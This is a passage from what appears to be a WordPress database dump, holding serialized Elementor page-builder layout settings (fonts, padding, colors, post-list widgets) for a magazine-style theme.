size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"]},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1260,451,'_elementor_version','0.4'),(1261,451,'_elementor_css','a:3:{s:4:\"time\";i:1508891385;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1263,452,'_elementor_edit_mode','builder'),(1264,452,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overla